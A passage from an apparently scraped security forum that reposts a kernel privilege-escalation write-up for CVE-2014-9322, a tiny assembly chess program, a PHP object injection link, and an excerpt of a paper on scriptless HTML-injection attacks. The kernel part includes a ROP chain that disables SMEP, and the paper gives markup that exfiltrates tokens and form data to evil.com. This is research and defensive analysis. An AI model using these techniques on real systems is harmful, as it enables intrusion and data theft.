SIGSEGV) && 323 printk_ratelimit()) { 324 pr_info("%s[%d] general protection ip:%lx sp:%lx error:%lx", 325 tsk->comm, task_pid_nr(tsk), 326 regs->ip, regs->sp, error_code); 327 print_vma_addr(" in ", regs->ip); 328 pr_cont("\n"); 329 } 330 331 force_sig_info(SIGSEGV, SEND_SIG_PRIV, tsk); 332 exit: 333 exception_exit(prev_state); 334 } It is far from obvious from the C code, but the assignment to tsk from current macro uses memory read with gs prefix. Line 306 is actually: 0xffffffff8164b79d : mov %gs:0xc780,%rbx This gets interesting. We control the “current” pointer, that points to the giant data structure describing the whole Linux process. Particularly, the lines 319 tsk->thread.error_code = error_code; 320 tsk->thread.trap_nr = X86_TRAP_GP; are writes to addresses (at some fixed offset from the beginning of the task struct) that we control. Note that the values being written are not controllable (they are 0 and 0xd constants, respectively), but this should not be a problem. Game over ? Not quite. Say, we want to overwrite some important kernel data structure at X. If we do the following steps: prepare usermode memory at FAKE_PERCPU, and set gs base to it Make the location FAKE_PERCPU+0xc780 hold the pointer FAKE_CURRENT_WITH_OFFSET, such that FAKE_CURRENT_WITH_OFFSET= X – offsetof(struct task_struct, thread.error_code) trigger the vulnerability Then indeed do_general_protection will write to X. But soon afterwards it will try to access other fields in the current task_struct again; e.g. unhandled_signal() function dereferences a pointer from task_struct. We have no control what lies beyond X, and the result will be a page fault in kernel. How can we cope with this? Options: Do nothing. Linux kernel, unlike e.g. Windows, is quite permissive when it gets an unexpected page fault in kernel mode – if possible, it kills the current process, and tries to continue (while Windows bluescreens immediately). This does not work – the result is massive kernel data corruption and whole system freeze. My suspicion is that after the current process is killed, the swapgs imbalance persists, resulting in many unexpected page faults in the context of the other processes. Use the “tsk->thread.error_code = error_code” write to overwrite IDT entry for the page fault handler. Then the page fault (triggered by, say, unhandled_signal()) will result in running our code. This technique proved to be successful on a couple of occasions before. This does not work, either, for two reasons: Linux makes IDT read-only (bravo!) even if IDT was writeable, we do not control the overwrite value – it is 0 or 0xd. If we overwrite the top DWORDS of IDT entry for #PF, the resulting address will be in usermode, and SMEP will prevent handler execution (more on SMEP later). We could nullify the lowest one or two bytes of the legal handler address, but the chances of these two addresses being an useful stack pivot sequence are negligible. [*]We can try a race. Say, “tsk->thread.error_code = error_code” write facilitates code execution, e.g. allows to control code pointer P that is called via SOME_SYSCALL. Then we can trigger our vulnerability on CPU 0, and at the same time CPU 1 can run SOME_SYSCALL in a loop. The idea is that we will get code execution via CPU 1 before damage is done on CPU 0, and e.g. hook the page fault handler, so that CPU 0 can do no more harm. I tried this approach a couple of times, with no luck; perhaps with different vulnerability the timings would be different and it would work better. [*]Throw a towel on “tsk->thread.error_code = error_code” write. With some disgust, we will follow the last option. We will point “current” to usermode location, setting the pointers in it so that the read dereferences on them hit our (controlled) memory. Naturally, we inspect the subsequent code to find more pointer write dereferences. Achieving write primitive continued, aka life after do_general_protection Our next chance is the function called by do_general_protection(): int force_sig_info(int sig, struct siginfo *info, struct task_struct *t) { unsigned long int flags; int ret, blocked, ignored; struct k_sigaction *action; spin_lock_irqsave(&t->sighand->siglock, flags); action = &t->sighand->action[sig-1]; ignored = action->sa.sa_handler == SIG_IGN; blocked = sigismember(&t->blocked, sig); if (blocked || ignored) { action->sa.sa_handler = SIG_DFL; if (blocked) { sigdelset(&t->blocked, sig); recalc_sigpending_and_wake(t); } } if (action->sa.sa_handler == SIG_DFL) t->signal->flags &= ~SIGNAL_UNKILLABLE; ret = specific_send_sig_info(sig, info, t); spin_unlock_irqrestore(&t->sighand->siglock, flags); return ret; } The field “sighand” in task_struct is a pointer, that we can set to an arbitrary value. It means that the action = &t->sighand->action[sig-1]; action->sa.sa_handler = SIG_DFL; lines are another chance for write primitive to an arbitrary location. Again, we do not control the write value – it is the constant SIG_DFL, equal to 0. This finally works, hurray ! with a little twist. Assume we want to overwrite location X in the kernel. We prepare our fake task_struct (particularly sighand field in it) so that X = address of t->sighand->action[sig-1].sa.sa_handler. But a few lines above, there is a line spin_lock_irqsave(&t->sighand->siglock, flags); As t->sighand->siglock is at constant offset from t->sighand->action[sig-1].sa.sa_handler, it means kernel will call spin_lock_irqsave on some address located after X, say at X+SPINLOCK, whose content we do not control. What happens then? There are two possibilities: memory at X+SPINLOCK looks like an unlocked spinlock. spin_lock_irqsave will complete immediately. Final spin_unlock_irqrestore will undo the writes done by spin_lock_irqsave. Good. memory at X+SPINLOCK looks like a locked spinlock. spin_lock_irqsave will loop waiting for the spinlock – infinitely, if we do not react. This is worrying. In order to bypass this, we will need another assumption – we will need to know we are in this situation, meaning we will need to know the contents of memory at X+SPINLOCK. This is acceptable – we will see later that we will set X to be in kernel .data section. We will do the following: initially, prepare FAKE_CURRENT so that t->sighand->siglock points to a locked spinlock in usermode, at SPINLOCK_USERMODE force_sig_info() will hang in spin_lock_irqsave at this moment, another usermode thread running on another CPU will change t->sighand, so that t->sighand->action[sig-1].sa.sa_handler is our overwrite target, and then unlock SPINLOCK_USERMODE spin_lock_irqsave will return. force_sig_info() will reload t->sighand, and perform the desired write. A careful reader is encouraged to enquire why cannot use the latter approach in the case X+SPINLOCK is initially unlocked. This is not all yet – we will need to prepare a few more fields in FAKE_CURRENT so that as little code as possible is executed. I will spare you the details – this blog is way too long already. The bottom line is that it works. What happens next? force_sig_info() returns, and do_general_protection() returns. The subsequent iret will throw #SS again (because still the usermode ss value on the stack refers to a nonpresent segment). But this time, the extra swapgs instruction in #SS handler will return the balance to the Force, cancelling the effect of the previous incorrect swapgs. do_general_protection() will be invoked and operate on real task_struct, not FAKE_CURRENT. Finally, the current task will be sent SIGSEGV, and another process will be scheduled for execution. The system remains stable. Digression: SMEP SMEP is a feature of Intel processors, starting from 3rd generation of Core processor. If the SMEP bit is set in CR4, CPU will refuse to execute code with kernel privileges if the code resides in usermode pages. Linux enables SMEP by default if available. Achieving code execution The previous paragraphs showed a way to overwrite 8 consecutive bytes in kernel memory with 0. How to turn this into code execution, assuming SMEP is enabled? Overwriting a kernel code pointer would not work. We can either nullify its top bytes – but then the resulting address would be in usermode, and SMEP will prevent dereference of this pointer. Alternatively, we can nullify a few low bytes, but then the chances that the resulting pointer would point to an useful stack pivot sequence are low. What we need is a kernel pointer P to structure X, that contains code pointers. We can overwrite top bytes of P so that the resulting address is in usermode, and P->code_pointer_in_) call will jump to a location that we can choose. I am not sure what is the best object to attack. For my experiments, I choose the kernel proc_rootvariable. It is a structure of type struct proc_dir_entry { ... const struct inode_operations *proc_iops; const struct file_operations *proc_fops; struct proc_dir_entry *next, *parent, *subdir; ... u8 namelen; char name[]; }; This structure represents an entry in the proc filesystem (and proc_root represents the root of the /proc filesystem). When a filename path starting with /proc is looked up, the “subdir” pointers (starting with proc_root.subdir) are followed, until the matching name is found. Afterwards, pointers from proc_iops are called: struct inode_operations { struct dentry * (*lookup) (struct inode *,struct dentry *, unsigned int); void * (*follow_link) (struct dentry *, struct nameidata *); ...many more... int (*update_time)(struct inode *, struct timespec *, int); ... } ____cacheline_aligned; proc_root resides in the kernel data section. It means that the exploit needs to know its address. This information is available from /proc/kallsyms; however, many hardened kernels do not allow unprivileged users to read from this pseudofile. Still, if the kernel is a known build (say, shipped with a distribution), this address can be obtained offline; along with tens of offsets required to build FAKE_CURRENT. So, we will ovewrite proc_root.subdir so that it becomes a pointer to a controlled struct proc_dir_entry residing in usermode. A slight complication is that we cannot overwrite the whole pointer. Remember, our write primitive is “overwrite with 8 zeroes”. If we made proc_root.subdirbe 0, we would not be able to map it, because Linux does not allow usermode to map address 0 (more precisely, any address below /proc/sys/vm/mmap_min_addr, but the latter is 4k by default). It means we need to: map 16MB of memory at address 4096 fill it with a pattern resembling proc_dir_entry, with the inode_operations field pointing to usermode address FAKE_IOPS, and name field being “A” string. configure the exploit to overwrite the top 5 bytes of proc_root.subdir Then, unless the bottom 3 bytes of proc_root.subdir are 0, we can be sure that after triggering the overwrite in force_sig_info() proc_root.subdir will point to controlled usermode memory. When our process will call open(“/proc/A”, …), pointers from FAKE_IOPS will be called. What should they point to? If you think the answer is “to our shellcode”, go back and read again. We will need to point FAKE_IOPS pointers to a stack pivot sequence. This again assumes the knowledge of the precise version of the kernel running. The usual “xchg %esp, %eax; ret” code sequence (it is two bytes only, 94 c3, found at 0xffffffff8119f1ed in case of the tested kernel), works very well for 64bit kernel ROP. Even if there is no control over %rax, this xchg instruction operates on 32bit registers, thus clearing the high 32bits of %rsp, and landing %rsp in usermode memory. At the worst case, we may need to allocate low 4GB of virtual memory and fill it with rop chain. In the case of the tested kernel, two different ways to dereference pointers in FAKE_IOPS were observed: %rax:=FAKE_IOPS; call *SOME_OFFSET(%rax) %rax:=FAKE_IOPS; %rax:=SOME_OFFSET(%rax); call *%rax In the first case, after %rsp is exchanged with %rax, it will be equal to FAKE_IOPS. We need the rop chain to reside at the beginning of FAKE_IOPS, so it needs to start with something like “add $A_LOT, %rsp; ret”, and continue after the end of FAKE_IOPS pointers. In the second case, the %rsp will be assigned the low 32bits of the call target, so 0x8119f1ed. We need to prepare the rop chain at this address as well. To sum up, as the %rax value has one of two known values at the moment of the entry to the stack pivot sequence, we do not need to fill the whole 4G with rop chain, just the above two addresses. The ROP chain itself is straightforward, shown for the second case: unsigned long *stack=0x8119f1ed; *stack++=0xffffffff81307bcdULL; // pop rdi, ret *stack++=0x407e0; //cr4 with smep bit cleared *stack++=0xffffffff8104c394ULL; // mov rdi, cr4; pop %rbp; ret *stack++=0xaabbccdd; // placeholder for rbp *stack++=actual_shellcode_in_usermode_pages; Digression: SMAP SMAP is a feature of Intel processors, starting from 5th generation of Core processor. If the SMAP bit is set in CR4, CPU will refuse to access memory with kernel privileges if this memory resides in usermode pages. Linux enables SMAP by default if available. A test kernel module (run on an a system with Core-M 5Y10a CPU) that tries to access usermode crashes with: [ 314.099024] running with cr4=0x3407e0 [ 389.885318] BUG: unable to handle kernel paging request at 00007f9d87670000 [ 389.885455] IP: [ffffffffa0832029] test_write_proc+0x29/0x50 [smaptest] [ 389.885577] PGD 427cf067 PUD 42b22067 PMD 41ef3067 PTE 80000000408f9867 [ 389.887253] Code: 48 8b 33 48 c7 c7 3f 30 83 a0 31 c0 e8 21 c1 f0 e0 44 89 e0 48 8b As we can see, although the usermode page is present, access to it throws a page fault. Windows systems do not seem to support SMAP; Windows 10 Technical Preview build 9926 runs with cr4=0x1506f8 (SMEP set, SMAP unset); in comparison with Linux (that was tested on the same hardware) you can see that bit 21 in cr4 is not set. This is not surprising; in case of Linux, access to usermode is performed explicitely, via copy_from_user, copy_to_user and similar functions, so it is doable to turn off SMAP temporarily for the duration of these functions. On Windows, kernel code accesses usermode directly, just wrapping the access in the exception handler, so it is more difficult to adjust all the drivers in all required places to work properly with SMAP. SMAP to the rescue! The above exploitation method relied on preparing certain data structures in usermode and forcing the kernel to interpret them as trusted kernel data. This approach will not work with SMAP enabled – CPU will refuse to read malicious data from usermode. What we could do is to craft all the required data structures, and then copy them to the kernel. For instance if one does write(pipe_filedescriptor, evil_data, ... then evil_data will be copied to a kernel pipe buffer. We would need to guess its address; some sort of heap spraying, combined with the fact that there is no spoon^W effective kernel ASLR, could work, although it is likely to be less reliable than exploitation without SMAP. However, there is one more hurdle – remember, we need to set usermode gs base to point to our exploit data structures. In the scenario above (without SMAP), we used arch_prctl(ARCH_SET_GS) syscall, that is implemented in the following way in the kernel: long do_arch_prctl(struct task_struct *task, int code, unsigned long addr) { int ret = 0; int doit = task == current; int cpu; switch (code) { case ARCH_SET_GS: if (addr >= TASK_SIZE_OF(task)) return -EPERM; ... honour the request otherwise Houston, we have a problem – we cannot use this API to set gs base above the end of usermode memory ! Recent CPUs feature wrgsbase instruction, that sets the gs base directly. This is a nonprivileged instruction, but needs to be enabled by the kernel by setting the FSGSBASE bit (no 16) in CR4. Linux does not set this bit, and therefore usermode cannot use this instruction. On 64bits, nonsystem entries in GDT and LDT are still 8 bytes long, and the base field is at most 4G-1 – so, no chance to set up a segment with base address in kernel space. So, unless I missed another way to set usermode gs base in the kernel range, SMAP protects 64bit Linux against achieving arbitrary code execution via exploiting CVE-2014-9322. Sursa: http://labs.bromium.com/2015/02/02/exploiting-badiret-vulnerability-cve-2014-9322-linux-kernel-privilege-escalation/-
- 1
-
-
Toledo Atomchess Game By January 28, 2015 came to my knowledge a new chess program written in 487 bytes of x86 assembly code. I don't ever ran it and moved to another things as I was kind of busy. Nevertheless my friends from JS1K and Twitter encouraged me to do something, and I've some notions of x86 machine code. So I started coding my own chess program in x86 assembler, I finished it in 24 hours and went for another 24 hours debugging it. After this I gave a look to the documentation of the other chess program and I was surprised it made illegal movements and doesn't even has a search tree, for me that is like not playing any chess. So here it is, my game is Toledo Atomchess and it is 481 bytes of x86 assembly code and it plays very reasonably under the limitations. Plays basic chess movements (no en passant, no castling and no promotion) Enter your movements as basic algebraic (D2D4) Your movements aren't checked for legality Search depth of 3-ply How to run it To run it you need a 1.44 MB floppy disk and put the 512 byte into the boot sector using an utility like Rawrite, also available as a COM file runable in MS-DOS or Wind*ws command-line. Download Toledo Atomchess package (5.8K) The source code Here is the full source code [FONT=Verdana] ;[/FONT] ; Toledo Atomchess ; ; by Óscar Toledo Gutiérrez ; ; © Copyright 2015 Óscar Toledo Gutiérrez ; ; Creation: 28-ene-2015 21:00 local time. ; Revision: 29-ene-2015 18:17 local time. Finished. ; Revision: 30-ene-2015 13:34 local time. Debugging finished. ; Features: ; * Basic chess movements. ; * Enter moves as algebraic form (D2D4) (note your moves aren't validated) ; * Search depth of 3-ply ; * No promotion of pawns. ; * No castling ; * No en passant. ; * 481 bytes size (fits in a boot sector) ; Note: I'm lazy enough to write my own assembler instead of ; searching for one, so you will have to excuse my syntax code16 ; Change to org &0100 for COM file org &7c00 ; Housekeeping mov sp,stack cld push cs push cs push cs pop ds pop es pop ss ; Create board mov bx,board sr1: mov al,bl and al,&88 ; 0x88 board jz sr2 mov al,&07 ; Frontier sr2: mov [bx],al inc bl jnz sr1 ; Setup board mov si,initial sr3: lodsb ; Load piece mov [bx],al ; Black pieces or al,8 mov [bx+&70],al ; White pieces mov al,&01 mov [bx+&10],al ; Black pawn mov al,&09 mov [bx+&60],al ; White pawn inc bx cmp bl,&08 jnz sr3 ; ; Main loop ; sr21: call display_board call key2 push di call key2 pop si movsb mov byte [si-1],0 call display_board mov ch,&08 ; Current turn (0=White, 8=Black) call play jmp short sr21 ; ; Computer plays ; play: mov bp,-32768 ; Current score push bp ; Origin square push bp ; Target square xor ch,8 ; Change side mov si,board sr7: lodsb ; Read square xor al,ch ; XOR with current playing side dec ax cmp al,6 ; Ignore if frontier jnc sr6 or al,al ; Is it pawn? jnz sr8 or ch,ch ; Is it playing black? jnz sr25 ; No, jump sr8: inc ax sr25: dec si mov bx,offsets push ax xlat mov dh,al ; Movements offset pop ax mov bl,total&255 xlat mov dl,al ; Total movements of piece sr12: mov di,si ; Restart target square mov bl,displacement&255 mov al,dh xlat mov cl,al sr9: add di,cx and di,&ff or di,board mov al,[si] ; Content of: origin in al, target in ah mov ah,[di] or ah,ah ; Empty square? jz sr10 xor ah,ch sub ah,&09 ; Valid capture? cmp ah,&06 mov ah,[di] jnc sr18 ; No, avoid cmp dh,14 ; Pawn? jc sr19 test cl,1 ; Straight? je sr18 ; Yes, avoid jmp short sr19 sr10: cmp dh,14 ; Pawn? jc sr19 test cl,1 ; Diagonal? jne sr18 ; Yes, avoid sr19: push ax ; Save for restoring in near future mov bl,scores&255 mov al,ah and al,7 cmp al,6 ; King eaten? jne sr20 cmp sp,stack-(3+8+3)*2 ; If in first response... mov bp,20000 ; ...maximum score (probably checkmate/slatemate) jne sr26 mov bp,7811 ; Maximum score sr26: add sp,6 ; Ignore values jmp short sr24 sr20: xlat cbw ; cmp sp,stack-(3+8+3+8+3+8+3+8+3)*2 ; 4-ply depth cmp sp,stack-(3+8+3+8+3+8+3)*2 ; 3-ply depth ; cmp sp,stack-(3+8+3+8+3)*2 ; 2-ply depth ; cmp sp,stack-(3+8+3)*2 ; 1-ply depth jbe sr22 pusha movsb ; Do move mov byte [si-1],ah ; Clear origin square call play mov bx,sp sub [bx+14],bp ; Substract BP from AX popa sr22: cmp bp,ax ; Better score? jg sr23 ; No, jump mov bp,ax ; New best score jne sr27 in al,(&40) cmp al,&55 ; Randomize it jb sr23 sr27: pop ax add sp,4 push si ; Save movement push di push ax sr23: pop ax ; Restore board mov [si],al mov [di],ah sr18: dec ax and al,&07 ; Was it pawn? jz sr11 ; Yes, check special cmp al,&04 ; Knight or king? jnc sr14 ; End sequence, choose next movement or ah,ah ; To empty square? jz sr9 ; Yes, follow line of squares sr16: jmp short sr14 sr11: and cl,&1f ; Advanced it first square? cmp cl,&10 jnz sr14 sr15: or ah,ah ; Pawn to empty square? jnz sr17 ; No, cancel double-square movement mov ax,si cmp al,&20 ; At first top row? jb sr14 ; Yes, jump cmp al,&60 ; At first bottom row? jb sr17 ; No, cancel double-square movement sr14: inc dh dec dl jnz sr12 sr17: inc si sr6: cmp si,board+120 jne sr7 pop di pop si cmp sp,stack-2 jne sr24 cmp bp,-16384 ; Illegal move? (always in check) jl sr24 ; Yes, doesn't move movsb mov byte [si-1],0 sr24: xor ch,8 ret display_board: ; Display board call display3 mov si,board sr4: lodsb mov bx,chars xlat call display2 sr5: cmp si,board+128 jnz sr4 ret key2: mov di,board+127 call key add di,ax call key shl al,4 sub di,ax ret key: push di mov ah,0 int &16 push ax call display pop ax and ax,&0f pop di ret display2: cmp al,&0d jnz display display3: add si,7 mov al,&0a call display mov al,&0d display: push si mov ah,&0e mov bh,&00 int &10 pop si ret initial: db 2,5,3,4,6,3,5,2 scores: db 0,10,50,30,90,30 chars: db ".prbqnk",&0d,".PRBQNK" offsets: db 14,18,8,12,8,0,8 total: db 4, 4,4, 4,8,8,8 displacement: db -33,-31,-18,-14,14,18,31,33 db -16,16,-1,1 db 15,17,-15,-17 db -16,-32 db 15,17,16,32 ; 29 bytes to say something db "Toledo Atomchess" db "nanochess.org" ; ; This marker is required for BIOS to boot floppy disk ; ds &7dfe-* ; Change to &02fe for COM file db &55,&aa board: ds 256 ds 256 stack: [FONT=arial][FONT=Verdana] end[/FONT][/FONT] Sursa: Toledo Atomchess Game
-
Asta e prost. E ca si cum ar veni acum Italia sa zica ca jumatate din Europa e a lor pentru ca a apartinut Imperiului Roman.
-
Understanding PHP Object Injection January 5, 2015 Ionut Popescu PHP Object Injection is not a very common vulnerability, it may be difficult to exploit but it also may be really dangerous. In order to understand this vulnerability, understanding of basic PHP code is required. Vulnerable applications If you may think this is not an important type of vulnerability, please see the list below. Researchers found PHP Object Injection vulnerabilities in very common PHP applications: WordPress 3.6.1 Magento 1.9.0.1 Joomla 3.0.3 IP Board 3.3.4 And many others. There may be a lot of other undiscovered PHP Object Injections in these or in other very common PHP applications, so maybe you can take a coffee break and try to understand it. Articol complet: http://securitycafe.ro/2015/01/05/understanding-php-object-injection/
-
Postcards from the post-XSS world Michal Zalewski, <lcamtuf@coredump.cx> 1. Introduction HTML markup injection vulnerabilities are one of the most significant and pervasive threats to the security of web applications. They arise whenever, in the process of generating HTML documents, the underlying code inserts attacker-controlled variables into the output stream without properly screening them for syntax control characters. Such a mistake allows the party controlling the offending input to alter the structure - and thus the meaning - of the produced document.In practical settings, markup injection vulnerabilities are almost always leveraged to execute attacker-supplied JavaScript code in the client-side browsing contextassociated with the vulnerable application. The term cross-site scripting, a common name for this class of flaws, reflects the prevalence of this approach.The JavaScript language is popular with attackers because of its versatility, and the ease with which it may be employed to exfiltrate arbitrarily chosen data, alter the appearance of the targeted website, or to perform server-side state changes on behalf of the authenticated user. Consequently, most of the ongoing browser-level efforts to improve the security of web applications focus on the containment of attacker-originating scripts. The most notable example of this trend is undoubtedly the Content Security Policy, a mechanism that removes the ability to inline JavaScript code in a protected HTML document, and maintains a whitelist of permissible sources for any externally-loaded scripts. Several related approaches, such as the NoScript add-on, the built-in XSS filters in Internet Explorer and Chrome, client-side APIs such astoStaticHTML(...), or the HTML sanitizers built into server-side frameworks, also deserve a note.This page is a rough collection of notes on some of the fundamental alternatives to direct script injection that would be available to attackers following the universal deployment of CSP or other security mechanisms designed to prevent the execution of unauthorized scripts. I hope to demonstrate that in many cases, the capabilities offered by these alternative methods are highly compatible with the goals of contemporary XSS attacks. 2. Content exfiltration One of the most rudimentary goals of a successful XSS attack is the extraction of user-specific secrets from the vulnerable application. Historically, XSS exploits sought to obtain HTTP cookies associated with the authenticated user session; these tokens - a form of ambient authority - could be later replayed by the attacker to remotely impersonate the victim within the targeted site. The introduction of httponly cookies greatly limited this possibility - and prompted rogue parties to pursue finer-grained approaches.In an application where theft of HTTP cookies is not practical, exfiltration attempts are usually geared toward the extraction of any of the following: Personal data. In applications such as webmail systems, discussion or messaging platforms, social networks, or shopping or banking sites, the information about the user may be of immense value on its own merit. The extraction of contact lists, messaging history, or transaction records, may be the ultimate goal of an attack. Tokens used to defend against cross-site request forgery attacks. Under normal circumstances, any website loaded in the victim's browser is free to blindly initiate cross-domain requests to any destination. Because such a request is automatically supplanted with user's ambient credentials, it is difficult to distinguish it from a request that arises in response to a legitimate user action. To prevent malicious interference, most websites append session-specific, unpredictable secrets - XSRF tokens - to all GET URLs or POST request bodies that change the state of user account or perform other disruptive tasks.The tokens are an attractive target for exfiltration, because their possession enables the attacker to bypass the defense, and construct valid-looking state changing requests that can be relayed through the victim's browser later on. Such requests may, for example, instruct the application to add an attacker-controlled persona as a privileged contact or a delegate for the victim. Capability-bearing URLs. Many modern web applications make occasional use of capability-bearing URLs; this is particularly common for constructing invitation and sharing links; offering downloads of private data; implementing single sign-on flows (SSO); or performing federated login. The ability for the attacker to obtain these URLs is equivalent to gaining access to the protected resource or functionality; especially in the case of authentication flows, that token may be equivalent to HTTP cookies. In this section, I'd like to present several exfiltration strategies that enable attackers to extract these types of data without the need to execute JavaScript. 2.1. Dangling markup injection Perhaps the least complicated extraction technique employs the injection of non-terminated markup. This action prompts the receiving parser to consume a significant portion of the subsequent HTML syntax, until the expected terminating sequence is encountered.To illustrate this attack, consider the following example of a markup injection vector:<img src='http://evil.com/log.cgi? ? Injected line with a non-terminated parameter ... <input type="hidden" name="xsrf_token" value="12345"> ... ' ? Normally-occurring apostrophe in page text ... </div> ? Any normally-occurring tag (to provide a closing bracket) Any markup between the opening single quote of the src parameter and the next occurrence of a matching quote will be treated as a part of the image URL. Consequently, the browser will issue a request to retrieve the image from the specified location - thereby disclosing the secret value to an attacker-controlled destination: http://evil.com/log.cgi?...<input type="hidden" name="xsrf_token" value="12345">... Note that in some deployments of CSP, the destination URLs for <img> tags may be restricted for non-security reasons; in these cases, the attacker is free to leverage several other tags, including <meta http-equiv="Refresh" ...> - honored anywhere in the document in all popular browsers, and not subject to policy controls.In either case, the attacker may choose the parameter quoting scheme to counter the prevalent syntax used on the targeted page; single and double quoted are recognized by all browsers, and in Internet Explorer, backtick (`) is also a recognized option. In most browsers, the HTML parser must encounter a matching quote and a greater-than character before the end of the document; otherwise, the malformed tag will be ignored. This is not true for all HTML parsers, however: Opera and older versions of Firefox will close the tag implicitly.To succeed, the attack also requires the injection point to appear before the secret to be extracted. If governed by pure chance, this condition will be met in 50% of all cases. In practice, the odds will often be higher: It is not uncommon for a vulnerable website to embed several copies of the same secret, or several instances of an improperly escaped parameter, on a single page. 2.2. <textarea>-based consumption The dangling markup vector discussed in section 2.1 is to some extent dependent on the layout of the vulnerable page; in absence of a matching quote character, or in presence of mixed-style quoting in the legitimately present markup, the attack may be difficult to carry out. These constraints are removed by leveraging the CDATA-like behavior of the <textarea> tag, however.The possibility is illustrated by the following snippet: <form action='http://evil.com/log.cgi'><textarea> ? Injected line ... <input type="hidden" name="xsrf_token" value="12345"> ... (EOF) In this case, all browsers will implicitly close the <textarea> and <form> blocks.The weakness of this approach is that in contrast to the previous method, a degree of user interaction is needed to exfiltrate the data: The victim must submit the form by pressing ENTER or clicking the submit button. This interaction is easy to facilitate by giving the submit button a misleading appearance - for example, as a faux notification or an interstitial to be dismissed, or even a transparent overlay that spans the entire browser window. That goal can be typically achieved by leveraging existing CSS classes in the application, or other methods discussed later in this document (section 3.3).It is also worth noting that forms with auto-submit capabilities are being considered for HTML5; such a feature may unintentionally assist with the automation of this attack in future browsers.Attribution: The idea for <textarea>-based markup consumption comes from an upcoming paper on data exfiltration by Eric Y. Chen, Sergey Gorbaty, Astha Singhal, and Collin Jackson. According to Gareth Heyes, it might have been discussed previously, too. Gareth additionally points out similar consumption vectors via <button> and <option>. 2.3. Rerouting of existing forms Another exfiltration opportunity is afforded by a peculiar property of HTML: The <form> tag can't be nested, and the top-level occurrence of this markup always takes precedence over subsequent appearances. This allows the attacker to change the URL to which any existing form will be submitted, simply by injecting an additional form definition in the preceding portion of the document: <form action='http://evil.com/log.cgi'> ? Injected line ... <form action='update_profile.php'> ? Legitimate, pre-existing form ... <input type="text" name="real_name" value="John Q. Public"> ... </form> This attack is particularly interesting when used to target forms automatically populated with user-specific secrets - as would be the case with any forms used to update profile information, shipping or billing address, or other contact data; form-based XSRF tokens are also a possible target. 2.4. Use of <base> to hijack relative URLs The next exfiltration vector worth highlighting relies on the injection of <base> tags. A majority of web browsers honor this tag outside the standards-mandated <head> section; in such a case, the attacker injecting this markup would be able to change the semantics of all subsequently appearing relative URLs, e.g.: <base href='http://evil.com/'> ? Injected line ... <form action='update_profile.php'> ? Legitimate, pre-existing form ... <input type="text" name="real_name" value="John Q. Public"> ... </form> Here, any user-initiated profile update will be submitted to http://evil.com/update_profile.php, rather than back to the originating server that produced the HTML document. 2.5. Form injection to intercept browser-managed passwords In-browser password managers are a popular tool for simplifying account management across multiple websites. They operate by detecting HTML forms that include a password field, and offering the user to save the entered credentials in a browser-operated password jar. The stored passwords are then automatically inserted into any plausibly-looking forms encountered within a matching origin. In Chrome and Firefox, this autocompletion requires no user interaction; in Internet Explorer and Opera, an additional gesture may be required.The attacker may obtain stored passwords by leveraging a markup injection vulnerability to present the browser with a well-structured password form. In absence of the ability to execute scripts, the next step is browser- and application-specific: In browsers such as Chrome and Opera, the actual URL to which the form submits (the action parameter) may be selected arbitrarily and may point to an attacker-controlled server. This offers a very straightforward exfiltration opportunity. In most other browsers, it is possible to present a form that specifies GET instead of POST as the submission mode (the method parameter), and submit the credentials to a carefully selected same-site destination. That destination may be a page that links to or includes subresources from third-party sites (thus leaking the credentials in theReferer header); or a page that echoes back query parameters in the response body, and is vulnerable to any of the previously discussed exfiltration methods. 2.6. Addendum: The limits of exfiltration defenses It is tempting to counter the vectors previously outlined in the document by simply preventing the attacker from contacting third-party servers; for example, one may wish to restrict the set of permissible destinations for markup such as <form>, <a href=...>, or <img>. Indeed, several academic anti-exfiltration frameworks have been proposed in the past, either as a sole defense against the consequences of cross-site scripting, or to be used in tandem with script execution countermeasures. It appears that some desire to prevent exfiltration influenced the original proposals for CSP, too.It must be noted, however, that any attempts to prevent exfiltration, even in script-less environments, are very unlikely to be successful. Browsers offer extensive indirect data disclosure opportunities through channels such as the Referer technique outlined in 2.5; through the window.name parameter that persists across origins (and policy scopes) on newly created views; and through a variety of DOM inspection and renderer and cache timing vectors that may be used by third-party documents to make surprisingly fine-grained observations about the structure of the policed page.It is also important to recognize that exfiltration attempts do not have to be geared toward relaying the data to a third-party website to begin with: In many settings, it is sufficient to move the data from private and into public view, all within the scope of a single website. A simple illustration of this attack on an e-commerce site may be: <form action='/post_review.php'> <input type='hidden' name='review_body' value=" ? Injected lines ... Your current shipping address: ? Existing page text to be exfiltrated 123 Evergreen Terrace Springfield, USA ... <form action="/update_address.php"> ? Existing form (ignored by the parser) ... <input type="hidden" name="xsrf_token" value="12345"> ? Token valid for /update_address.php and /post_review.php ... </form> This form, if interacted with, will unexpectedly submit the victim's home address as the body of a publicly visible product review, where the attacker may be able to intercept it before the user notices the problem and reacts.Attribution: The second technique presented above is inspired by an upcoming paper on data exfiltration by Eric Y. Chen, Sergey Gorbaty, Astha Singhal, and Collin Jackson. 3. Infiltration of application logic Data exfiltration is one of the important goals in the exploitation of XSS vulnerabilities, but is not the only one. In some settings, the attacker may be more interested in actively disrupting the state of the targeted application; these attacks typically seek one or more of the following outcomes: Alteration or destruction of legitimate content. Most attackers will seek to immediately replace victim-owned documents with misleading or disparaging content, to distribute offensive messages, or to simply destroy valuable data. Delegation of account access. Such attacks seek to gain longer-term access to the capabilities offered by the targeted site - such as read-only or read-write access to victim's private data. On a content publishing platform, this may involve adding an attacker-controlled persona as a secondary administrator of the victim-owned channel, or as a collaborator on a particular document; in a webmail system, the attack may focus on creating a mail forwarding rule to siphon off all the incoming mail; and on a social networking site, the goal may be to add the attacker as a trusted contact ("friend"). Use of special privileges. In select cases, attackers may wish to abuse additional privileges bestowed upon the vulnerable origin by the browser itself (e.g., the ability to change critical settings, install extensions or updates); or the trust the user associates with the targeted site (perhaps expressed as the willingness to accept unsolicited downloads). Propagation of attacker-supplied markup. Certain attacks seek to create autonomously propagating worms that spread between the users of a site by leveraging site-specific messaging and content sharing mechanisms. The creation of a worm may be an accomplishment in itself, or a way for maximizing the efficiency of any other attack. This section showcases techniques that may be used to further these goals in absence of the ability to inject attacker-supplied code. 3.1. Interference with existing scripts Contemporary web applications make extensive use of JavaScript to handle the bulk of content presentation and user interface tasks. From the security standpoint, these responsibilities may have seemed insignificant, but this view no longer holds true; for example, in an collaborative document editor, client-side scripts may be tasked with: Determining and recording the outcome of user-initiated ACL changes for the document ("sharing dialogs"), Sanitizing or escaping server-supplied strings to make them safe for display, Keeping track and synchronizing the contents of the edited file. By analogy to conceptually similar but better-studied race condition or off-by-one vulnerabilities in non-browser applications, it can be expected that the ability to put the execution environment in an inconsistent and unexpected state will not merely render the program inoperative - but will routinely lead to outcomes desirable to the attacker. 3.1.1. HTML 